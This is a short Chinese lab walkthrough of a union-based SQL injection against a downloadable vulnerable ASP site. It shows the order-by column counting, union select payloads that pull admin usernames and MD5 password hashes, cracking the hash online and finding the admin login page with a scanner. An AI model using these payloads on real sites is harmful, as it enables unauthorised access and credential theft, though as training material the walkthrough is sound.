链接: https://pan.baidu.com/s/1ls-kOD30Hs-jQebcOCLDKQ 提取码: lsz1
环境搭建
步骤一:将环境附件下载到wwwroot下面
步骤二:访问IIS绑定的IP地址
sql注入流程
步骤一:新闻中心 -> 公司新闻
步骤二:判断注入方式
输入' 数据报错
结果为数字型
步骤三:判断列数
?id=14 order by 7
?id=14 order by 8 数据报错
列数为7
步骤四:判断表名
?id=14 union select 1,2,3,4,5,6,7 from admin
?id=14 union select 1,2,3,4,5,6,7 from administrator
经多次判断得出表名为administrator
步骤五:判断字段
?id=14 union select 1,tablename,3,4,5,6,7 from administrator 数据报错
?id=14 union select 1,user_name,3,4,5,6,7 from administrator
?id=14 union select 1,user_name,3,4,password,6,7 from administrator
得出用户名admin 密码 21232f297a57a5a743894a0e4a801fc3
步骤六:利用md5在线解密破解
得出结果admin
步骤七:利用御剑搜索后台登录
/admin/index.asp
最后输入用户名和密码